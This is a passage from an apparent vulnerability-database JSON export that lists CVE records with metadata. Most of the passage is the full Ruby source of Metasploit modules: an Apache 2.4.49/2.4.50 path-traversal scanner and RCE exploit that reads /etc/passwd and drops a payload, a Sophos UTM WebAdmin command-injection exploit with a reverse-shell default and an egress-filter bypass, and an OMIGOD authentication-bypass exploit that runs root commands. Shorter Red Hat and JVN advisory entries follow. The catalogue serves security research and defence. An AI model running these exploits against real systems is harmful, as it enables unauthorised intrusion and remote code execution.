\"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{cmd}\"\n })\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def read_traversal\n send_request_raw({\n 'method' => 'GET',\n 'uri' => normalize_uri(@target_uri, @traversal.to_s)\n })\n end\n\n def run_host(ip)\n @proto = (ssl ? 'https' : 'http')\n\n case action.name\n when 'CHECK_TRAVERSAL'\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << '/etc/passwd'\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?('root:x:0:0:')\n print_good(message(\"The target is vulnerable to #{datastore['CVE']}.\"))\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']}.\"))\n\n return Exploit::CheckCode::Safe\n when 'CHECK_RCE'\n @traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n rand_str = Rex::Text.rand_text_alpha(4..8)\n\n response = exec_traversal(\"echo #{rand_str}\")\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?(rand_str)\n print_good(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']} (requires mod_cgi to be enabled).\"))\n\n return Exploit::CheckCode::Safe\n when 'READ_FILE'\n fail_with(Failure::BadConfig, 'File path option is empty!') if !datastore['FILEPATH'] || datastore['FILEPATH'].empty?\n\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << datastore['FILEPATH']\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n if response.code == 500\n print_warning(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n end\n\n if response.code == 500 || response.body.empty?\n print_error('Nothing was downloaded')\n\n return Exploit::CheckCode::Vulnerable if response.code == 500\n end\n\n if response.code == 200\n vprint_good(\"#{peer} \\n#{response.body}\")\n path = store_loot(\n 'apache.traversal',\n 'application/octet-stream',\n ip,\n response.body,\n datastore['FILEPATH']\n )\n print_good(\"File saved in: #{path}\")\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_normalize_path.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T10:41:58", "description": "This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T11:22:47", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-10T13:01:15", "id": "MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/apache_normalize_path_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apache_normalize_path_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-03T06:46:28", "description": "This module exploits an SID-based command injection in Sophos UTM's WebAdmin interface to execute shell commands as the root user.\n", "cvss3": {}, "published": "2021-10-28T00:31:03", "type": "metasploit", "title": "Sophos UTM WebAdmin SID Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25223"], "modified": "2021-11-16T15:12:57", "id": "MSF:EXPLOIT-LINUX-HTTP-SOPHOS_UTM_WEBADMIN_SID_CMD_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/stopwatch'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sophos UTM WebAdmin SID Command Injection',\n 'Description' => %q{\n This module exploits an SID-based command injection in Sophos UTM's\n WebAdmin interface to execute shell commands as the root user.\n },\n 'Author' => [\n # Discovered by unknown researcher(s)\n 'Justin Kennedy', # Analysis and PoC\n 'wvu' # Supplementary analysis and exploit\n ],\n 'References' => [\n ['CVE', '2020-25223'],\n ['URL', 'https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce'],\n ['URL', 'https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223'],\n ['URL', 'https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a']\n ],\n 'DisclosureDate' => '2020-09-18',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 4444,\n 'LPORT' => 443, # XXX: Bypass Sophos UTM's egress filtering\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n sleep_time = rand(5..10)\n\n injected, elapsed_time = Rex::Stopwatch.elapsed_time do\n inject_cmd(\"sleep #{sleep_time}\", timeout: sleep_time * 1.5)\n end\n\n return CheckCode::Unknown if injected.nil?\n\n vprint_status(\"Elapsed time: #{elapsed_time} seconds\")\n\n # injected == false\n unless injected && elapsed_time > sleep_time\n return CheckCode::Safe('Failed to test command injection.')\n end\n\n # injected == true\n CheckCode::Appears('Successfully tested command injection.')\n end\n\n def exploit\n unless datastore['LPORT'] == 443\n print_warning('LPORT=443 is recommended to bypass egress filtering')\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n # nil or true on success\n if inject_cmd(cmd) == false\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n end\n\n def inject_cmd(cmd, timeout: 3.5)\n vprint_status(\"Injecting command: #{cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'var'),\n 'ctype' => 'application/json; charset=UTF-8', # NOTE: charset is required\n 'data' => {\n 'SID' => \"|#{cmd}|\" # https://perldoc.perl.org/functions/open#Opening-a-filehandle-into-a-command\n }.to_json\n }, timeout)\n\n return unless res\n return false unless res.code == 200 && res.body.include?(alert_msg)\n\n true\n end\n\n def alert_msg\n # {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}\n 'Backend connection failed, please click Shift-Reload to try again.'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-02T03:02:15", "description": "By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint that will cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1 (released September 8th 2021).\n", "cvss3": {}, "published": "2021-10-25T21:36:55", "type": "metasploit", "title": "Microsoft OMI Management Interface Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-27T15:58:53", "id": "MSF:EXPLOIT-LINUX-MISC-CVE_2021_38647_OMIGOD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/cve_2021_38647_omigod/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft OMI Management Interface Authentication Bypass',\n 'Description' => %q{\n By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint\n that will cause it to execute an operating system command as the root user. This vulnerability was patched in\n OMI version 1.6.8-1 (released September 8th 2021).\n },\n 'Author' => [\n 'Nir Ohfeld', # vulnerability discovery & research\n 'Shir Tamari', # vulnerability discovery & research\n 'Spencer McIntyre', # metasploit module\n 'wvu' # vulnerability research\n ],\n 'References' => [\n ['CVE', '2021-38647'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],\n ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],\n ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],\n ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']\n ],\n 'DisclosureDate' => '2021-09-14',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 5985,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'AKA' => ['OMIGOD'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/wsman'])\n ])\n end\n\n def check\n http_res = send_command('id')\n return CheckCode::Unknown if http_res.nil?\n return CheckCode::Safe unless http_res.code == 200\n\n cmd_res = parse_response(http_res)\n return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\\d+)\\(\\S+\\) /\n\n return CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\")\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n result = execute_command(payload.encoded)\n if result\n print_status(result[:stdout]) unless result[:stdout].blank?\n print_error(result[:stderr]) unless result[:stderr].blank?\n end\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_command(cmd)\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n parse_response(res)\n end\n\n def parse_response(res)\n return nil unless res&.code == 200\n\n return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i\n unless return_code == 0\n print_error(\"Failed to execute command: #{cmd} (status: #{return_code})\")\n end\n\n {\n return_code: return_code,\n stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,\n stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content\n }\n end\n\n def send_command(cmd)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n ENVELOPE\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/cve_2021_38647_omigod.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2023-03-08T05:20:40", "description": "A path traversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T17:33:09", "type": "redhatcve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2023-03-08T05:13:29", "id": "RH:CVE-2021-42013", "href": "https://access.redhat.com/security/cve/cve-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-08T20:17:01", "description": "An incorrect memory management flaw was found in Squid, where it is vulnerable to a denial of service attack against all clients using the proxy. The highest threat from this vulnerability is to system availability.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-20T11:21:28", "type": "redhatcve", "title": "CVE-2021-31807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31807"], "modified": "2023-03-08T19:51:35", "id": "RH:CVE-2021-31807", "href": "https://access.redhat.com/security/cve/cve-2021-31807", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-03-08T20:16:59", "description": "An incorrect input validation flaw was found in Squid, where it is vulnerable to a denial of service attack against all clients using the proxy. The highest threat from this vulnerability is to system availability.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-20T11:21:28", "type": "redhatcve", "title": "CVE-2021-31806", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2023-03-08T19:51:35", "id": "RH:CVE-2021-31806", "href": "https://access.redhat.com/security/cve/cve-2021-31806", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-03-08T05:20:43", "description": "A path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T13:27:36", "type": "redhatcve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2023-03-08T05:11:48", "id": "RH:CVE-2021-41773", "href": "https://access.redhat.com/security/cve/cve-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "jvn": [{"lastseen": "2021-12-28T23:20:08", "description": "Apache HTTP Server provided by The Apache Software Foundation contains a directory traversal vulnerability (CWE-22).\n\n ## Impact\n\nA remote attacker may access the unprotected files in \"require all denied\" placed outside of the document root. \nMoreover, if CGI scripts are enabled, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Apache HTTP Server 2.4.49 and 2.4.50\nAccording to the developer, the issue is caused by insufficient fix for CVE-2021-41773. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 